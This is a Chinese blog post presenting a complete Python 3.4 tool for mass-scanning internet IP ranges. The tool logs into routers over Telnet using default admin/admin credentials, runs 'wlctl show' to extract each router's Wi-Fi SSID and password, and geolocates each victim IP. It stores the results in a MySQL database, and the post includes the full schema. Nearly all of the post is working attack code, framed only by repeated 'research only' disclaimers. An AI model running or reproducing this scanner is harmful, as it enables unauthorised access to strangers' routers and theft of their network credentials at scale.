python伪装wifi获取wifi密码_通过Telnet漏洞批量扫描获取wifi密码的脚本(Python3.4)

最新推荐文章于 2024-04-28 11:35:41 发布
最新推荐文章于 2024-04-28 11:35:41 发布
阅读量1.1k 收藏 6
点赞数 1
文章标签: python伪装wifi获取wifi密码

郑重声明:以下内容仅用于网络安全研究,严禁用于任何非法用途,违者自负。

前段时间在网上看到有人用Wifi Telnet老洞,编了一段Python2.7的批量扫描工具。由于我基本都用Python3.4,故做了一些改动,支持Python3.4。

主要改进有:改用pymysql、requests两个库;

修改建表SQL,区分password和ssid的大小写

改进程序入口

修改Timeout

Wifi Telnet老洞参照这里:

《FAST MERCIRY路由器telnet另类入侵 读取WIFI密码》 http://www.wooyun.org/bugs/wooyun-2013-026776

原Python2.7程序作者这里:

《批量扫描互联网无线路由设备telnet,并获取WIFI密码》 http://lcx.cc/?i=4513

郑重声明:以下内容仅用于网络安全研究,严禁用于任何非法用途,违者自负。

程序需要MySQL数据库配套运行,其实也并不是很难。改进后的程序,需要注意安装一下pymysql、requests这两个库。推荐使用pip安装。pip install pymysql

pip install requests

MySQL数据库建ttlwifi库,建表SQL如下:/*

SQLyog Ultimate v11.24 (64 bit)

MySQL - 5.1.28-rc-community : Database - ttlwifi

*********************************************************************

*/

/*!40101 SET NAMES utf8 */;

/*!40101 SET SQL_MODE=''*/;

/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;

/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;

/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;

/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

CREATE DATABASE /*!32312 IF NOT EXISTS*/`ttlwifi` /*!40100 DEFAULT CHARACTER SET utf8 */;

USE `ttlwifi`;

/*Table structure for table `keydata` */

DROP TABLE IF EXISTS `keydata`;

CREATE TABLE `keydata` (

`id` int(11) NOT NULL AUTO_INCREMENT,

`ip` varchar(20) NOT NULL,

`ssid` varchar(50) BINARY NOT NULL,

`password` varchar(64) BINARY NOT NULL,

`createtime` varchar(24) NOT NULL,

`country` varchar(20) NOT NULL,

`province` varchar(20) NOT NULL,

`city` varchar(20) NOT NULL,

`isp` varchar(10) NOT NULL,

PRIMARY KEY (`id`)

) ENGINE=InnoDB AUTO_INCREMENT=6970 DEFAULT CHARSET=utf8;

/*Table structure for table `keydatatmp` */

DROP TABLE IF EXISTS `keydatatmp`;

CREATE TABLE `keydatatmp` (

`id` int(11) NOT NULL AUTO_INCREMENT,

`ip` varchar(20) NOT NULL,

`ssid` varchar(50) NOT NULL,

`password` varchar(64) NOT NULL,

`createtime` varchar(24) NOT NULL,

`country` varchar(20) DEFAULT NULL,

`province` varchar(20) DEFAULT NULL,

`city` varchar(20) DEFAULT NULL,

`isp` varchar(10) DEFAULT NULL,

PRIMARY KEY (`id`)

) ENGINE=InnoDB DEFAULT CHARSET=utf8;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;

/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;

/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;

/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

代码如下:#encoding=utf-8

#路由器密码扫描工具

#前置需求库:pymysql、requests

import pymysql

import requests

import queue

from threading import Thread

import telnetlib

import time

import re

import subprocess

import json

#from collections import queue

class Database:

host = 'localhost'

user = 'root'

password = 'root'

db = 'ttlwifi'

charset = 'utf8'

def __init__(self):

self.my=pymysql.connect(host=self.host,user=self.user,passwd=self.password,db=self.db,charset=self.charset)

self.myc=self.my.cursor(pymysql.cursors.DictCursor)

def insert(self, query):

#print(query)

try:

self.myc.execute(query)

self.my.commit()

except:

self.my.rollback()

def query(self, query):

self.myc.execute(query)

return self.myc.fetchall()

def __del__(self):

self.my.close()

#ip to num

def ip2num(ip):

ip = [int(x) for x in ip.split('.')]

return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

#num to ip

def num2ip(num):

return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,

(num & 0x00ff0000) >> 16,

(num & 0x0000ff00) >> 8,

num & 0x000000ff)

#get all ips list between start ip and end ip

def ip_range(start, end):

return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]

#main function

def bThread(iplist):

threadl = []

threads = 300 #------------------------------------------------------

queue1 = queue.Queue()

hosts = iplist

for host in hosts:

queue1.put(host)

threadl = [tThread(queue1) for x in list(range(0, threads))]

for t in threadl:

t.start()

for t in threadl:

t.join()

#get host position by Taobao API

def getposition(host):

try:

ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host

r = requests.get(ipurl)

value = json.loads(r.text)['data']

info = [value['country'],value['region'],value['city'],value['isp'] ]

return info

except Exception as e:

print("Get " + host+" position failed , will retry ...\n")

getposition(host)

class tThread(Thread):

username = "admin"

password = "admin"

TIMEOUT = 15

def __init__(self, queue1):

Thread.__init__(self)

self.queue1 = queue1

def run(self):

while not self.queue1.empty():

host = self.queue1.get()

try:

#print host

data = self.telnet(host)

except Exception as e:

#print(e)

continue

def telnet(self, host):

t = telnetlib.Telnet(host, timeout=self.TIMEOUT)

t.read_until(b"username:", self.TIMEOUT)

t.write(self.username.encode('ascii') + b"\n")

t.read_until(b"password:", self.TIMEOUT)

t.write(self.password.encode('ascii') + b"\n")

t.write(b"wlctl show\n")

t.read_until(b"SSID", self.TIMEOUT)

str = t.read_very_eager().decode('ascii')

t.close()

str = "".join(str.split())

SID = str[1:str.find('QSS')]

KEY = str[str.find('Key=') + 4:str.find('cmd')] if str.find('Key=') != -1 else ''

if SID != '':

currentTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))

try:

ipinfo = getposition(host)

mysql = Database()

queryStr = "SELECT id FROM keydata where password='%s' and ssid='%s'" % (KEY,SID)

ifexsit = len(mysql.query(queryStr))

if ifexsit<1:

try:

mysql.insert("INSERT INTO keydata(ip, ssid, password, createtime,country,province,city,isp) VALUES('%s', '%s', '%s', '%s','%s','%s','%s','%s')" % (host, SID.replace("'","''"), KEY.replace("'","''"),currentTime,ipinfo[0],ipinfo[1],ipinfo[2],ipinfo[3]))

print('['+host+']Insert '+ SID +' into database success !\n')

except Exception as e:

print('['+host+']Save '+ SID +' failed , will resave ...... \n')

bThread([host])

else:

print('['+host+']Found '+ SID +' in database ! \n')

except Exception as e:

print(e)

exit(1)

def run(startIp,endIp):

iplist = ip_range(startIp, endIp)

print('\nTotal '+str(len(iplist))+" IP...\n")

bThread(iplist)

if __name__ == '__main__':

startIp = input('Start IP:')

endIp = input('End IP:')

run(startIp, endIp)

程序有两种运行方式,一种是直接运行,输入起止IP。另一种是作为库被另一个脚本加载,run()函数作为接口,方便二次开发。

郑重声明:以上内容仅用于网络安全研究,严禁用于任何非法用途,违者自负。

weixin_39612733
关注
python ssh登录交换机_用python 脚本控制telnet登录交换机
weixin_30585729的博客
02-03 1473
目的:学习用python脚本登录交换机并执行相关操作环境:windows 7 Python 3.5.3情景:最初原因是因为工作,需要在交换机上查询IP地址的来源端口,不停的跳转查看很麻烦,于是决定写脚本,这里只写关于用Python登录和之后的可用方法。telnet是内置模块,模块名telnetlib。# 定义登录的用户名、密码和登录的设备地址username = 'abc'password = ...
最新终于把所有的Python库,都整理出来啦!_python 自带的键盘库(1)
最新发布
2401_84558914的博客
05-03 1153
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
wifi伪装
10-14
wifi伪装
Python骚操作!WiFi密码还能这样获取?用户扫一扫连接,无需输入密码!
爬遍所有网站
08-12 1987
一、老规矩,先上效果 1、将WiFi生成连接二维码 将电脑的WiFi直接通过二维码共享 无需泄露密码,安全共享 2、手机端扫描直接连接 访客通过手机扫一扫生成的二维码 可以不输入密码 直接连接至该网络。 二、项目目录如下 三、如何安装和使用该功能? 1、安装依赖包 pip install -r .\requirements.txt #安装依赖包 2、安装wifi-password功能 cd wifi-password #进入模块目录下 python.
实现动态封禁 IP,干死爬虫
m0_57472099的博客
04-28 359
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。完成以上步骤后,重新加载 nginx,配置便开始生效了。3、动态配置,可以手工或者通过某种自动化的方式设置 Redis 中的黑名单。Nginx 配置,其中。
基于pythonwifi 密码获取工具
10-20
自己写的小工具--基于python 可以获取电脑曾经连接过的的所有的 wifi 的密码,写完了发现实用性并不高了,嘛,就当练手了
通过Python模拟计算附近WIFI密码,没有我蹭不到的网
人生苦短, 还不用Python?
08-05 1596
事情是这样的,最近小学妹毕业了,找了份工作,昨天租了个房子,但是没得WiFi,还好我会Python, 于是吃晚饭的时候我顺手用Python给她写了一个代码来自动猜解WiFi密码
python标准库3.7.3.docx
05-10
### Python标准库3.7.3概述 Python标准库是Python语言的核心组成部分之一,它包含了大量预先...通过以上内容可以看出,Python标准库覆盖了从基础操作到高级应用的各个方面,为Python开发者提供了丰富的工具和资源。
设计一个单选题考试程序python_Python123计算机等级考试二级Python语言与程序设计通关指南七Python 计算生态...
weixin_39826342的博客
10-21 3639
请注意看红色标识文字,图片均是超清图片,可以单击查看看见更大的世界,遇见更好的自己 See a better world to meet better for ourselves.1.MMdnn----MMdnn 是一个深度学习的模型工具集,它能够互转模型文件、可视化模型结构、自动产生训练/推演的代码、辅助测试模型兼容性等。2.Matplotlib----Matplotlib 是一个高质...
所有的Python库,我都整理在这里了
kakA的博客
10-12 1222
加班加点整理出来的Python库,希望看到此篇文章的各位小伙伴,都可以学好Python~
python 暴力破解wifi密码
03-19
通过字典,用python去暴力破解wifi密码,大概一秒尝试一个字典信息。
python 破解 wifi密码
09-10
python 实现wifi密码的暴力破解。
telnet自动连接脚本
01-02
自动连接数据库 运行命令形如 ftprun1.bat 192.168.48.1 或 telnetcmd1.bat 192.168.48.1
C/C++ telnet自动登录路由器获取wifi密码
02-05
打开后输入IP地址范围,然后程序会自动连接这些ip地址,若IP地址打开了23端口且为弱密码就能连上,然后程序会自动传送wlctl show命令获取wifi ssid和key,并且保存在d盘下的txt上。想获取周围的wifi密码可以试一试本主机所在的网段。
黑客是如何伪装成公共wifi的--家用路由器实现Web认证
热门推荐
牟蘑菇的专栏
12-12 2万+
本文介绍一种使用笔记本电脑和普通路由器将wifi热点伪装成公共wifi的方法(例如CMCC等),基于iptables实现了简单的web认证功能。
批量扫描互联网无线路由设备telnet,并获取WIFI密码
weixin_33709590的博客
02-15 280
批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513
有趣的python实践案例(一)---获取WiFi密码+动态二维码
weixin_46263718的博客
03-30 650
wo们出python基础啦系列(一)—数据类型 wo们出python基础啦系列(二)—条件判断 有趣的python实践案例(一)—获取WiFi密码+动态二维码 前言 ​继上次的皮卡丘之后天线宝宝又来了!如大家所见,这是一个十分酷炫的动态二维码,而且还是可以扫描的哦!(直达佩奇的博客哈哈哈!) 看过这么可爱的二维码之后回到我们今天的正题!大家想象一下这个场景:古时候,家里来客时,客人会问您上乘的清茗是何处寻的。而在如今的互联网时代,客人可能会亲切地问一句:您家WiFi密码是多少?因此,今日的主题便是教各位如
Python如何实现查看WiFi密码
liululee的博客
11-06 1179
为了能够快速查看 Wi-Fi 密码,我们介绍了两种方法:一种是通过 Windows 的 Wi-Fi 属性查看密码,另一种是使用Python 中的 subprocess 模块来执行命令行获取密码;另外呢,有个名为 PyWifi 的第三方库,它可以用于操作 Wi-Fi,并提供了简单的 API 来获取 Wi-Fi 信息。比较适合我们获取到该网络的信息,以及使用 pywifi 模块实现一些更高级的功能,例如检测 Wi-Fi 网络的质量、分析数据流量等等。如果你觉得文章还不错,记得关注公众号: 锅外的大佬。
android 伪装 wifi,移动数据伪装wifi软件xposed手机版-手机移动数据伪装wifi模块xposedv1.4最新版_新绿资源网...
weixin_36149595的博客
05-27 7204
手机移动数据伪装wifi模块xposed是一款wifi伪装移动数据模块,配合xp框架、应用变量实现移动数据伪装、应用参数修改、模拟器过检测开挂辅助等功能,完全免费无毒,下载安装吧!应用介绍:手机移动数据伪装wifi软件,帮你一键实现wifi数据互相伪装娱乐,非常实用!【相关软件】https://www.lanzoux.com/b04yhzkri密码:5x5g使用方法:第一个模拟器也就是母盘 装进去...
Python脚本获取本机WiFi密码
本文将介绍如何使用Python编程语言来获取本机上所有Wi-Fi网络的密码。通过调用操作系统命令并解析输出结果,我们可以轻松地列出已连接或曾经连接过的Wi-Fi网络及其对应的密码。 在Python中,我们可以利用内置的`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值